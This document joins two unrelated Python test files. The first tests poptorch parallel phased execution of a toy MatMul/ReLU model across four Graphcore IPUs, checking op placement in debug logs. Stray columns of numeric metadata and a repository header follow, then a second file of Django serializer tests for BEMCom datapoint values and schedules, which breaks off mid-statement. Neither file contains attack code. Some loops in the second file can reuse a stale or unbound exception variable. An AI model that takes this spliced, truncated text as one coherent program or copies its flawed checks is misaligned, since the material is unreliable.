# Copyright (c) 2020 Graphcore Ltd. All rights reserved.
import torch
import torch.nn.functional as F
import poptorch
import helpers
# Model: 2x2 S1 ExecutionPhase, repeated N times:
# _____________________________________________________________________________
# phase 0: IPU 0 | IPU 2
# in0 ---- Slice/Slice -----------------------------.
# | | |
# w0 ----- MatMul | MatMul ----- w1
# | | |
# ReLU | ReLU
# | | |
# +------------------------.|.-----------+
#______________________________________X__(inter-phase cross-IPU copy)_________
# phase 1: IPU 1 /|\ IPU 3
# .-----------------------' | '----------.
# | | |
# w2 ----- MatMul | MatMul ----- w3
# | | |
# ReLU | ReLU
# | | |
# +------------------------.|.-----------+
# X (intra-phase cross-IPU copy)
# /|\
# .-----------------------' | '----------.
# | | |
# w4 ----- MatMul | MatMul ----- w5
# | | |
# ReLU | ReLU
# | | |
# +------------------------.|.-----------+
#______________________________________X_______________________________________
# phase 2: IPU 0 /|\ IPU 2
# ...... |
# ...... |
#______________________________________X__(inter-phase cross-IPU copy)_________
# phase N*2-1: IPU 1 /|\ IPU 3
# .-----------------------' | '----------.
# | | |
# w2 ----- MatMul | MatMul ----- w3
# | | |
# ReLU | ReLU
# | | |
# +------------------------.|.-----------+
# X (intra-phase cross-IPU copy)
# /|\
# .-----------------------' | '----------.
# | | |
# w4 ----- MatMul | MatMul ----- w5
# | | |
# ReLU | ReLU
# | | |
# +------------------------------------ Sum ----- L1Loss
#______________________________________|_______________________________________
class LogChecker(helpers.LogChecker):
    """Assertions over the poptorch debug log for the phased-execution tests.

    The model places pairs of MatMul/Relu ops on IPUs 0-3 across alternating
    execution phases; the expected log lines follow a regular pattern, so they
    are generated here instead of being spelled out one by one.
    """

    # Log line emitted for every op placed by the phased executor.
    _OP_LINE = "{op}:0{suffix} [float32(10, 1), mode(Phased), ipu({ipu}), phase({phase})]"

    @staticmethod
    def _op_placements(num_phase_pairs):
        """Return the (ipu, phase) placement of each MatMul/Relu, in order.

        Every pair of phases holds two ops on the even phase (IPUs 0, 2)
        followed by four ops on the odd phase (IPUs 1, 3, 1, 3).
        """
        placements = []
        for n in range(num_phase_pairs):
            even, odd = 2 * n, 2 * n + 1
            placements += [(0, even), (2, even)]
            placements += [(1, odd), (3, odd), (1, odd), (3, odd)]
        return placements

    def _validate_phased_log(self, num_phases):
        """Checks shared by the full (6 phase) and small (2 phase) variants."""
        self.assert_contains("enablePipelining set to value 0")
        self.assert_contains("executionPhaseSettings.stages set to value 2")
        self.assert_contains(
            "executionPhaseSettings.phases set to value %d" % num_phases)
        for location in ("activation", "weight", "optimizer", "accumulator"):
            self.assert_contains(
                "location_%s set to value useOnChipStorage(False)" % location)
        # The input split always happens on IPU 0 in phase 0.
        self.assert_contains(
            "Slice:0 [float32(10, 1), mode(Phased), ipu(0), phase(0)]")
        self.assert_contains(
            "Slice:0/1 [float32(10, 1), mode(Phased), ipu(0), phase(0)]")
        # One MatMul and one Relu per placement; the first op of each kind
        # has no "/index" suffix in the log.
        for index, (ipu, phase) in enumerate(
                self._op_placements(num_phases // 2)):
            suffix = "" if index == 0 else "/%d" % index
            for op in ("MatMul", "Relu"):
                self.assert_contains(
                    self._OP_LINE.format(op=op, suffix=suffix, ipu=ipu,
                                         phase=phase))
        # The loss pipeline lives on IPU 3 in the last phase.
        last_phase = num_phases - 1
        for op in ("Add", "Sub"):
            self.assert_contains(
                "%s:0 [float32(10, 1), mode(Phased), ipu(3), phase(%d)]" %
                (op, last_phase))
        for op in ("L1", "IdentityLoss"):
            self.assert_contains(
                "%s:0 [float32(shape inference failed), mode(Phased), "
                "ipu(3), phase(%d)]" % (op, last_phase))

    def validate_2x2_parallel_phased_execution(self):
        """Expected placement for the full N=3 (6 phase) model."""
        self._validate_phased_log(6)

    def validate_2x2_parallel_phased_execution_small(self):
        """Expected placement for the small (2 phase) model."""
        self._validate_phased_log(2)
def test_2x2_parallel_phased_execution_inline(capfd):
    """2x2 parallel phased execution with inline `ipu_id` Block annotations.

    Builds 2*N phases spread over IPUs 0-3 (even phases on 0/2, odd phases
    on 1/3) and checks the op placement reported in the poptorch debug log.
    """
    poptorch.setLogLevel(1)  # Force debug logging
    N = 3
    size = 10

    class Model(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.weights = []
            for n in range(N * 6):
                weight = torch.nn.Parameter(torch.rand(size, size),
                                            requires_grad=True)
                self.register_parameter(f"w{n}", weight)
                self.weights.append(weight)

        def forward(self, in0, target=None):
            phase = 0
            with poptorch.Block("0", ipu_id=0):
                ins = torch.split(in0, size)
                weight = iter(self.weights)
            for n in range(N * 3):
                out = []
                for ipu in range(2):
                    x = ins[ipu]
                    # Alternate between 0-2 and 1-3
                    ipu = (phase % 2) + ipu * 2
                    with poptorch.Block(f"{phase}", ipu_id=ipu):
                        x = torch.matmul(next(weight), x)
                        out.append(F.relu(x))
                ins = out[1], out[0]
                # We want 2 matmuls in the same phase
                if n % 3 != 1:
                    phase += 1
            with poptorch.Block(f"{N*2-1}", ipu_id=3):
                res = ins[0] + ins[1]
                if target is None:
                    return res
                return res, torch.nn.L1Loss(reduction="mean")(res, target)

    # Renamed from `input` to avoid shadowing the builtin.
    model_input = torch.rand(size * 2, 1)
    target = torch.rand(size, 1)
    model = Model()
    opts = poptorch.Options()
    # Bug fix: the original assigned `phases = []` and immediately
    # overwrote it with the comprehension; the dead assignment is gone.
    phases = [f"{n}" for n in range(2 * N)]
    opts.setExecutionStrategy(poptorch.ParallelPhasedExecution(*phases))
    poptorch_model = poptorch.trainingModel(model, opts)
    poptorch_model.compile(model_input, target)

    testlog = LogChecker(capfd)
    testlog.validate_2x2_parallel_phased_execution()
def test_2x2_parallel_phased_execution_opts(capfd):
    """Same model as the inline test, but IPU placement comes from Stages."""
    poptorch.setLogLevel(1)  # Force debug logging
    N = 3
    size = 10

    class Model(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.weights = []
            for n in range(N * 6):
                weight = torch.nn.Parameter(torch.rand(size, size),
                                            requires_grad=True)
                self.register_parameter(f"w{n}", weight)
                self.weights.append(weight)

        def forward(self, in0, target=None):
            phase = 0
            weight = iter(self.weights)
            with poptorch.Block("phase0_ipu0"):
                ins = torch.split(in0, size)
            for step in range(N * 3):
                outputs = []
                for idx in range(2):
                    with poptorch.Block(f"phase{phase}_ipu{idx}"):
                        y = torch.matmul(next(weight), ins[idx])
                        outputs.append(F.relu(y))
                ins = outputs[1], outputs[0]
                # We want 2 matmuls in the same phase
                if step % 3 != 1:
                    phase += 1
            with poptorch.Block(f"phase{N*2-1}_ipu1"):
                res = ins[0] + ins[1]
                if target is None:
                    return res
                return res, torch.nn.L1Loss(reduction="mean")(res, target)

    in_data = torch.rand(size * 2, 1)
    target = torch.rand(size, 1)
    model = Model()

    opts = poptorch.Options()
    # Alternate between 0-2 (even phases) and 1-3 (odd phases)
    phases = []
    for n in range(N):
        even, odd = 2 * n, 2 * n + 1
        phases.append([
            poptorch.Stage(f"phase{even}_ipu0").ipu(0),
            poptorch.Stage(f"phase{even}_ipu1").ipu(2),
        ])
        phases.append([
            poptorch.Stage(f"phase{odd}_ipu0").ipu(1),
            poptorch.Stage(f"phase{odd}_ipu1").ipu(3),
        ])
    opts.setExecutionStrategy(poptorch.ParallelPhasedExecution(*phases))

    poptorch_model = poptorch.trainingModel(model, opts)
    poptorch_model.compile(in_data, target)

    testlog = LogChecker(capfd)
    testlog.validate_2x2_parallel_phased_execution()
def test_2x2_parallel_phased_execution_small_opts(capfd):
    """Two-phase variant using auto-id Blocks plus an explicit strategy."""
    poptorch.setLogLevel(1)  # Force debug logging
    size = 10

    class Model(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.weights = []
            for n in range(6):
                weight = torch.nn.Parameter(torch.rand(size, size),
                                            requires_grad=True)
                self.register_parameter(f"w{n}", weight)
                self.weights.append(weight)

        def forward(self, in0, target=None):
            poptorch.Block.useAutoId()
            weight = iter(self.weights)

            # Block "0" -> phase 0 / ipu 0: split the input, first matmul.
            with poptorch.Block():
                in0, in1 = torch.split(in0, size)
                out0 = F.relu(torch.matmul(next(weight), in0))
            # Block "1" -> phase 0 / ipu 2
            with poptorch.Block():
                out1 = F.relu(torch.matmul(next(weight), in1))
            in0, in1 = out1, out0

            # Block "2" -> phase 1 / ipu 1
            with poptorch.Block():
                out0 = F.relu(torch.matmul(next(weight), in0))
            # Block "3" -> phase 1 / ipu 3
            with poptorch.Block():
                out1 = F.relu(torch.matmul(next(weight), in1))
            in0, in1 = out1, out0

            # Block "4" -> phase 1 / ipu 1 - part 2
            with poptorch.Block():
                out0 = F.relu(torch.matmul(next(weight), in0))
            # Block "5" -> phase 1 / ipu 3 - part 2
            with poptorch.Block():
                out1 = F.relu(torch.matmul(next(weight), in1))

            res = out0 + out1
            if target is None:
                return res
            return res, torch.nn.L1Loss(reduction="mean")(res, target)

    in_data = torch.rand(size * 2, 1)
    target = torch.rand(size, 1)
    model = Model()

    opts = poptorch.Options()
    strategy = poptorch.ParallelPhasedExecution(
        [poptorch.Stage("0"), poptorch.Stage("1")],
        [poptorch.Stage("2", "4"),
         poptorch.Stage("3", "5")])
    # Alternate between 0-2 and 1-3
    strategy.phase(0).ipus(0, 2)
    strategy.phase(1).ipus(1, 3)
    opts.setExecutionStrategy(strategy)

    poptorch_model = poptorch.trainingModel(model, opts)
    poptorch_model.compile(in_data, target)

    testlog = LogChecker(capfd)
    testlog.validate_2x2_parallel_phased_execution_small()
| 40.895833
| 94
| 0.490123
| 1,947
| 17,667
| 4.193118
| 0.087827
| 0.090642
| 0.163155
| 0.096031
| 0.911318
| 0.897232
| 0.874694
| 0.849461
| 0.835252
| 0.835252
| 0
| 0.064058
| 0.354956
| 17,667
| 431
| 95
| 40.990719
| 0.652334
| 0.194487
| 0
| 0.760656
| 0
| 0.196721
| 0.308969
| 0.022669
| 0
| 0
| 0
| 0
| 0.242623
| 1
| 0.036066
| false
| 0
| 0.013115
| 0
| 0.081967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac4164d0f9356a9a1322fd64fb5ad1265aa1d4f0
| 77,260
|
py
|
Python
|
services/apis/django-api/source/api/ems_utils/tests/test_message_format_serializers.py
|
fzi-forschungszentrum-informatik/BEMCom
|
0a0c359d889c6d5975e4d4d3b17c24adb5bf883b
|
[
"MIT"
] | 4
|
2021-09-10T09:46:18.000Z
|
2021-12-05T17:55:14.000Z
|
services/apis/django-api/source/api/ems_utils/tests/test_message_format_serializers.py
|
fzi-forschungszentrum-informatik/BEMCom
|
0a0c359d889c6d5975e4d4d3b17c24adb5bf883b
|
[
"MIT"
] | null | null | null |
services/apis/django-api/source/api/ems_utils/tests/test_message_format_serializers.py
|
fzi-forschungszentrum-informatik/BEMCom
|
0a0c359d889c6d5975e4d4d3b17c24adb5bf883b
|
[
"MIT"
] | null | null | null |
import json
import logging
from django.db import connection, models
from django.test import TransactionTestCase
from ems_utils.message_format.models import DatapointTemplate
from ems_utils.message_format.models import DatapointValueTemplate
from ems_utils.message_format.models import DatapointScheduleTemplate
from ems_utils.message_format.models import DatapointSetpointTemplate
from ems_utils.message_format.serializers import DatapointValueSerializer
from ems_utils.message_format.serializers import DatapointScheduleSerializer
from ems_utils.message_format.serializers import DatapointSetpointSerializer
from ems_utils.timestamp import datetime_from_timestamp, timestamp_utc_now
logger = logging.getLogger(__name__)
class TestDatapointValueSerializer(TransactionTestCase):
    """
    Tests for DatapointValueSerializer: serialization to JSON and validation
    of incoming value messages against a concrete Datapoint/DatapointValue
    model pair created on the fly.
    """

    @classmethod
    def setUpClass(cls):
        # Datapoint model is abstract, hence no table exists. Here we
        # create a concrete model as child of datapoint and create a table
        # on the fly for testing.
        class Datapoint(DatapointTemplate):
            class Meta:
                app_label = "test_message_format_models_5"

        class DatapointValue(DatapointValueTemplate):
            class Meta:
                app_label = "test_message_format_models_5"

            # The datapoint foreign key must be overwritten as it points
            # to the abstract datapoint model by default.
            datapoint = models.ForeignKey(
                Datapoint,
                on_delete=models.CASCADE,
            )

        cls.Datapoint = Datapoint
        cls.DatapointValue = DatapointValue
        with connection.schema_editor() as schema_editor:
            schema_editor.create_model(cls.Datapoint)
            schema_editor.create_model(cls.DatapointValue)

        # Create a dummy datapoint to be used as foreign key for the msgs.
        cls.datapoint = cls.Datapoint(type="sensor")
        cls.datapoint.save()

        # Here are the default field values:
        cls.default_field_values = {
            "datapoint": cls.datapoint,
            "time": datetime_from_timestamp(1612860152000),
        }

    @classmethod
    def tearDownClass(cls) -> None:
        # Finally, erase the table of the temporary model.
        with connection.schema_editor() as schema_editor:
            schema_editor.delete_model(cls.Datapoint)
            schema_editor.delete_model(cls.DatapointValue)

    def tearDown(self):
        """
        Remove the dummy datapoint, so next test starts with empty tables.
        """
        self.DatapointValue.objects.all().delete()

    @staticmethod
    def _validation_error(serializer):
        """
        Validate `serializer` and return the raised exception, or None when
        the data validated fine. Replaces the try/except boilerplate that
        was duplicated in every test below.
        """
        try:
            serializer.is_valid(raise_exception=True)
        except Exception as exception:
            return exception
        return None

    def _assert_value_rejected(self, serializer):
        """
        Assert that validation fails with HTTP 400, complaining about the
        "value" field.
        """
        caught_exception = self._validation_error(serializer)
        assert caught_exception is not None
        assert caught_exception.status_code == 400
        assert "value" in caught_exception.detail

    def test_to_representation(self):
        """
        Check that a value message is serialized as expected.
        """
        for test_value in [1, 2.2, "not a number", None, True, False]:
            expected_data = {
                "value": json.dumps(test_value),
                "timestamp": timestamp_utc_now(),
            }
            field_values = self.default_field_values.copy()
            field_values.update({
                "value": test_value,
                "time": datetime_from_timestamp(expected_data["timestamp"]),
            })
            dp_value = self.DatapointValue.objects.create(**field_values)

            serializer = DatapointValueSerializer(dp_value)
            assert serializer.data == expected_data

    def test_required_fields(self):
        """
        Check that timestamp and value fields must be provided.
        """
        field_values = self.default_field_values.copy()
        dp_value = self.DatapointValue.objects.create(**field_values)
        serializer = DatapointValueSerializer(dp_value, data=json.loads("{}"))

        caught_exception = self._validation_error(serializer)
        # Bug fix: guard against None first. Previously a wrongly-valid
        # payload crashed with AttributeError on None instead of a clear
        # assertion failure.
        assert caught_exception is not None
        assert caught_exception.status_code == 400
        assert "value" in caught_exception.detail
        assert "timestamp" in caught_exception.detail

    def test_numeric_values_validated(self):
        """
        Check that for numeric data_format values, only numeric values are
        accepted.
        """
        dp = self.datapoint
        numeric_data_formats = [
            "generic_numeric",
            "continuous_numeric",
            "discrete_numeric",
        ]
        for data_format in numeric_data_formats:
            # Verify that non numeric types will raise.
            for test_data_value in ["not a number", True, False]:
                dp.data_format = data_format
                dp.allowed_values = [test_data_value]
                dp.save()
                test_data = {
                    "value": json.dumps(test_data_value),
                    "timestamp": timestamp_utc_now(),
                }
                serializer = DatapointValueSerializer(dp, data=test_data)
                self._assert_value_rejected(serializer)

            # Check that JSON encoded floats and ints are decoded during
            # validation.
            for test_data_value in [1, 2.2, None]:
                dp.data_format = data_format
                dp.allowed_values = [test_data_value]
                dp.save()
                test_data = {
                    "value": json.dumps(test_data_value),
                    "timestamp": timestamp_utc_now(),
                }
                serializer = DatapointValueSerializer(dp, data=test_data)
                assert serializer.is_valid(raise_exception=True)
                assert serializer.validated_data["value"] == test_data_value

    def test_text_values_validated(self):
        """
        Verify that text datapoints don't accept numeric values or bools.
        """
        dp = self.datapoint
        text_data_formats = [
            "generic_text",
            "discrete_text",
        ]
        for data_format in text_data_formats:
            for test_data_value in [1, 2.2, True, False]:
                dp.data_format = data_format
                dp.allowed_values = [test_data_value]
                dp.save()
                test_data = {
                    "value": json.dumps(test_data_value),
                    "timestamp": timestamp_utc_now(),
                }
                serializer = DatapointValueSerializer(dp, data=test_data)
                self._assert_value_rejected(serializer)

            # Check that JSON encoded strings (Nones are valid too) are
            # decoded during validation.
            for test_data_value in ["not a number", None]:
                dp.data_format = data_format
                dp.allowed_values = [test_data_value]
                dp.save()
                test_data = {
                    "value": json.dumps(test_data_value),
                    "timestamp": timestamp_utc_now(),
                }
                serializer = DatapointValueSerializer(dp, data=test_data)
                assert serializer.is_valid(raise_exception=True)
                assert serializer.validated_data["value"] == test_data_value

    def test_bool_values_validated(self):
        """
        Verify that bool datapoints only accept boolean values.
        """
        dp = self.datapoint
        dp.data_format = "bool"
        for test_data_value in [1, 2.2, "not a number", None]:
            dp.allowed_values = [test_data_value]
            dp.save()
            test_data = {
                "value": json.dumps(test_data_value),
                "timestamp": timestamp_utc_now(),
            }
            serializer = DatapointValueSerializer(dp, data=test_data)
            self._assert_value_rejected(serializer)

        # Check that JSON encoded bools are decoded during validation.
        for test_data_value in [True, False]:
            dp.allowed_values = [test_data_value]
            dp.save()
            test_data = {
                "value": json.dumps(test_data_value),
                "timestamp": timestamp_utc_now(),
            }
            serializer = DatapointValueSerializer(dp, data=test_data)
            assert serializer.is_valid(raise_exception=True)
            assert serializer.validated_data["value"] == test_data_value

    def test_unknown_format_values_accept_anything(self):
        """
        Datapoints with unknown format should accept anything.
        """
        dp = self.datapoint
        dp.data_format = "unknown"
        dp.allowed_values = []  # Is empty to prove that it is not used.
        dp.save()
        for test_data_value in [1, 2.2, "not a number", None, True, False]:
            test_data = {
                "value": json.dumps(test_data_value),
                "timestamp": timestamp_utc_now(),
            }
            serializer = DatapointValueSerializer(dp, data=test_data)
            assert serializer.is_valid(raise_exception=True)
            assert serializer.validated_data["value"] == test_data_value

    def test_value_in_min_max(self):
        """
        Check that for continuous numeric datapoints only those values are
        accepted that reside within the min/max bound, at least if min/max
        are set.
        """
        dp = self.datapoint
        dp.data_format = "continuous_numeric"
        dp.save()

        valid_combinations = [
            {"min": 1.00, "max": 3.00, "value": 2.00},
            {"min": None, "max": None, "value": 2.00},
            {"min": 1.00, "max": 3.00, "value": None},
            {"min": None, "max": 3.00, "value": 0.00},
            {"min": 1.00, "max": None, "value": 4.00},
        ]
        for valid_combination in valid_combinations:
            dp.min_value = valid_combination["min"]
            dp.max_value = valid_combination["max"]
            dp.save()
            test_data = {
                "value": json.dumps(valid_combination["value"]),
                "timestamp": timestamp_utc_now(),
            }
            serializer = DatapointValueSerializer(dp, data=test_data)
            caught_exception = self._validation_error(serializer)
            if caught_exception is not None:
                # Log which combination failed before the bare assert below.
                logger.error(
                    "test_value_in_min_max failed for valid combination %s",
                    str(valid_combination),
                )
            assert caught_exception is None

        invalid_combinations = [
            {"min": 1.00, "max": 3.00, "value": 4.00},
            {"min": 1.00, "max": 3.00, "value": 0.00},
            {"min": None, "max": 3.00, "value": 4.00},
            {"min": 1.00, "max": None, "value": 0.00},
        ]
        for invalid_combination in invalid_combinations:
            dp.min_value = invalid_combination["min"]
            dp.max_value = invalid_combination["max"]
            dp.save()
            test_data = {
                "value": json.dumps(invalid_combination["value"]),
                "timestamp": timestamp_utc_now(),
            }
            serializer = DatapointValueSerializer(dp, data=test_data)
            caught_exception = self._validation_error(serializer)
            if caught_exception is None:
                logger.error(
                    "test_value_in_min_max failed for invalid combination %s",
                    str(invalid_combination),
                )
            assert caught_exception is not None
            assert caught_exception.status_code == 400
            assert "value" in caught_exception.detail

    def test_value_in_allowed_values(self):
        """
        Check that for discrete valued datapoints only those values are
        accepted that have one of the accepted values.
        """
        dp = self.datapoint
        dp.description = "A sensor datapoint for testing"
        dp.data_format = "continuous_numeric"
        dp.save()

        valid_combinations = [
            {
                "value": 2.0,
                "data_format": "discrete_numeric",
                "allowed_values": [1.0, 2.0, 3.0]
            },
            {
                "value": 2,
                "data_format": "discrete_numeric",
                "allowed_values": [1, 2, 3]
            },
            {
                "value": "OK",
                "data_format": "discrete_text",
                "allowed_values": ["OK", "Done"]
            },
            {
                "value": None,
                "data_format": "discrete_text",
                "allowed_values": [None, "Nope"]
            },
        ]
        for valid_combination in valid_combinations:
            dp.data_format = valid_combination["data_format"]
            dp.allowed_values = valid_combination["allowed_values"]
            dp.save()
            test_data = {
                "value": json.dumps(valid_combination["value"]),
                "timestamp": timestamp_utc_now(),
            }
            serializer = DatapointValueSerializer(dp, data=test_data)
            caught_exception = self._validation_error(serializer)
            if caught_exception is not None:
                logger.error(
                    "test_value_in_allowed_values failed for valid "
                    "combination %s",
                    str(valid_combination),
                )
            assert caught_exception is None

        invalid_combinations = [
            {
                "value": 2.0,
                "data_format": "discrete_numeric",
                "allowed_values": [1.0, 3.0]
            },
            {
                "value": 2,
                "data_format": "discrete_numeric",
                "allowed_values": [1, 3]
            },
            {
                "value": 2,
                "data_format": "discrete_numeric",
                "allowed_values": []
            },
            {
                "value": "OK",
                "data_format": "discrete_text",
                "allowed_values": ["NotOK", "OK "]
            },
            {
                "value": "",
                "data_format": "discrete_text",
                "allowed_values": ["OK"]
            },
            {
                "value": None,
                "data_format": "discrete_text",
                "allowed_values": ["OK"]
            },
        ]
        for invalid_combination in invalid_combinations:
            dp.data_format = invalid_combination["data_format"]
            dp.allowed_values = invalid_combination["allowed_values"]
            dp.save()
            test_data = {
                "value": json.dumps(invalid_combination["value"]),
                "timestamp": timestamp_utc_now(),
            }
            serializer = DatapointValueSerializer(dp, data=test_data)
            caught_exception = self._validation_error(serializer)
            if caught_exception is None:
                # Bug fix: log the combination that actually failed;
                # previously this logged `valid_combination`.
                logger.error(
                    "test_value_in_allowed_values failed for invalid "
                    "combination %s",
                    str(invalid_combination),
                )
            assert caught_exception is not None
            assert caught_exception.status_code == 400
            assert "value" in caught_exception.detail

    def test_timestamp_validated(self):
        """
        Check that the serializer doesn't accept unreasonably low or high
        timestamp values, nor strings.
        """
        wrong_timestamps = [
            timestamp_utc_now() + 2e11,
            timestamp_utc_now() - 2e11,
            "asdkajsdkajs",
        ]
        for timestamp in wrong_timestamps:
            test_data = {
                "value": json.dumps(None),
                "timestamp": timestamp,
            }
            serializer = DatapointValueSerializer(
                self.datapoint, data=test_data
            )
            # Bug fix: the exception is now captured fresh per iteration.
            # Previously the variable was unbound on the first pass and
            # stale on later ones, so a wrongly accepted timestamp could
            # slip through unnoticed.
            caught_exception = self._validation_error(serializer)
            assert caught_exception is not None
            assert caught_exception.status_code == 400
            assert "timestamp" in caught_exception.detail
class TestDatapointScheduleSerializer(TransactionTestCase):
    @classmethod
    def setUpClass(cls):
        # Datapoint model is abstract, hence no table exists. Here we
        # create a concrete model as child of datapoint and create a table
        # on the fly for testing.
        class Datapoint(DatapointTemplate):
            class Meta:
                app_label="test_message_format_models_6"
        class DatapointSchedule(DatapointScheduleTemplate):
            class Meta:
                app_label="test_message_format_models_6"
            # The datapoint foreign key must be overwritten as it points
            # to the abstract datapoint model by default.
            datapoint = models.ForeignKey(
                Datapoint,
                on_delete=models.CASCADE,
            )
        cls.Datapoint = Datapoint
        cls.DatapointSchedule = DatapointSchedule
        # The throwaway models are not part of any installed app's
        # migrations, so their tables must be created by hand.
        with connection.schema_editor() as schema_editor:
            schema_editor.create_model(cls.Datapoint)
            schema_editor.create_model(cls.DatapointSchedule)
        # Create a dummy datapoint to be used as foreign key for the msgs.
        cls.datapoint = cls.Datapoint(type="sensor")
        cls.datapoint.save()
        # Here are the default field values:
        cls.default_field_values = {"datapoint": cls.datapoint}
@classmethod
def tearDownClass(cls) -> None:
# Finally, erase the table of the temporary model.
with connection.schema_editor() as schema_editor:
schema_editor.delete_model(cls.Datapoint)
schema_editor.delete_model(cls.DatapointSchedule)
def tearDown(self):
"""
Remove the dummy datapoint, so next test starts with empty tables.
"""
self.DatapointSchedule.objects.all().delete()
def test_to_representation(self):
"""
Check that a schedule message is serialized as expected.
"""
expected_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
'value': 21
},
{
"from_timestamp": timestamp_utc_now() + 1000,
"to_timestamp": None,
'value': None
}
],
"timestamp": timestamp_utc_now(),
}
field_values = self.default_field_values.copy()
field_values.update({
"schedule": expected_data["schedule"],
"time": datetime_from_timestamp(expected_data["timestamp"])
})
dp_schedule = self.DatapointSchedule.objects.create(**field_values)
serializer = DatapointScheduleSerializer(dp_schedule)
assert serializer.data == expected_data
#
# # Deactivated. None is currently not defined as a valid schedule
#
# def test_to_representation_for_none(self):
# """
# Check that a schedule message is serialized as expected if the
# schedule is None.
# """
# expected_data = {
# "schedule": None,
# "timestamp": timestamp_utc_now(),
# }
#
# field_values = self.default_field_values.copy()
# field_values.update({
# "schedule": expected_data["schedule"],
# "timestamp": datetime_from_timestamp(expected_data["timestamp"])
# })
# dp_schedule = self.DatapointSchedule.objects.create(**field_values)
#
# serializer = DatapointScheduleSerializer(dp_schedule)
# assert serializer.data == expected_data
def test_required_fields(self):
"""
Check that schedule and timestamp fields must be given.
"""
dp = self.datapoint
test_data = {}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
assert "timestamp" in caught_execption.detail
def test_timestamp_validated(self):
"""
Check that the serialzer doesn't accept unresonable low or high
timestamp values, nor strings.'
"""
wrong_timestamps = [
timestamp_utc_now() + 2e11,
timestamp_utc_now() - 2e11,
"asdkajsdkajs"
]
for timestamp in wrong_timestamps:
test_data = {
"schedule": None,
"timestamp": timestamp,
}
serializer = DatapointScheduleSerializer(
self.datapoint, data=test_data
)
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "timestamp" in caught_execption.detail
def test_schedule_validated_as_correct_json_or_null(self):
"""
Check that the schedule is validated to be a parsable as json.
"""
dp = self.datapoint
dp.data_format = "generic_text"
dp.save()
# First this is correct json.
test_data = {
"schedule": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
assert serializer.is_valid(raise_exception=True)
#
# # This is currently not a valid schedule anymore.
#
# # This is also ok.
# test_data = {
# "schedule": None,
# "timestamp": timestamp_utc_now(),
# }
# serializer = DatapointScheduleSerializer(dp, data=test_data)
# assert serializer.is_valid(raise_exception=True)
def test_schedule_validated_as_list(self):
"""
Check that the schedule is validated to be a list.
"""
dp = self.datapoint
dp.data_format = "generic_text"
dp.save()
# This is correct json but not a list of schedule items.
test_data = {
"schedule": {"Nope": 1},
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
def test_schedule_items_validated_as_dict(self):
"""
Check that the schedule items are validated to be dicts.
"""
dp = self.datapoint
dp.data_format = "generic_text"
dp.save()
# This is correct json but not a list of schedule items.
test_data = {
"schedule": ["Nope", 1],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointScheduleSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "schedule" in caught_execption.detail
def test_schedule_items_validated_for_expected_keys(self):
    """
    Check that the schedule items are validated to contain all of the
    expected keys.

    Each required key (`from_timestamp`, `to_timestamp`, `value`) is
    left out in turn; the serializer must reject the message with an
    error that names the missing key. The three previously copy-pasted
    stanzas are folded into one loop.
    """
    dp = self.datapoint
    dp.data_format = "generic_text"
    dp.save()
    # Dummy values for all keys of a complete schedule item.
    complete_item = {
        "from_timestamp": None,
        "to_timestamp": timestamp_utc_now() + 1000,
        "value": json.dumps("not a number"),
    }
    for missing_key in complete_item:
        schedule_item = {
            key: value for key, value in complete_item.items()
            if key != missing_key
        }
        test_data = {
            "schedule": [schedule_item],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointScheduleSerializer(dp, data=test_data)
        caught_execption = None
        try:
            serializer.is_valid(raise_exception=True)
        except Exception as e:
            caught_execption = e
        assert caught_execption is not None
        assert caught_execption.status_code == 400
        assert "schedule" in caught_execption.detail
        exception_detail = str(caught_execption.detail["schedule"])
        # The error message must name the missing key.
        assert missing_key in exception_detail
    # NOTE: Verifying that *additional* unexpected keys are rejected
    # doesn't work here: the serializer fields are explicitly defined
    # and the serializer simply ignores additional keys.
def test_numeric_value_of_schedule_validated(self):
    """
    Check that for numeric data_format values, only numeric values are
    accepted within schedules.
    """
    dp = self.datapoint
    dp.allowed_values = '["not a number"]'
    dp.save()

    def build_test_data():
        # One schedule item carrying a non numeric value.
        return {
            "schedule": [
                {
                    "from_timestamp": None,
                    "to_timestamp": timestamp_utc_now() + 1000,
                    "value": json.dumps("not a number"),
                }
            ],
            "timestamp": timestamp_utc_now(),
        }

    # For numeric data formats the non numeric value must be rejected.
    numeric_data_formats = [
        "generic_numeric",
        "continuous_numeric",
        "discrete_numeric",
    ]
    for data_format in numeric_data_formats:
        dp.data_format = data_format
        dp.save()
        serializer = DatapointScheduleSerializer(dp, data=build_test_data())
        caught_exception = None
        try:
            serializer.is_valid(raise_exception=True)
        except Exception as exception:
            caught_exception = exception
        assert caught_exception is not None
        assert caught_exception.status_code == 400
        assert "schedule" in caught_exception.detail
        exception_detail = str(caught_exception.detail["schedule"])
        assert "cannot be parsed to float" in exception_detail
    # Also verify the opposite, i.e. that text data formats accept the
    # very same value.
    text_data_formats = [
        "generic_text",
        "discrete_text",
    ]
    for data_format in text_data_formats:
        dp.data_format = data_format
        dp.save()
        serializer = DatapointScheduleSerializer(dp, data=build_test_data())
        caught_exception = None
        try:
            assert serializer.is_valid(raise_exception=True)
        except Exception as exception:
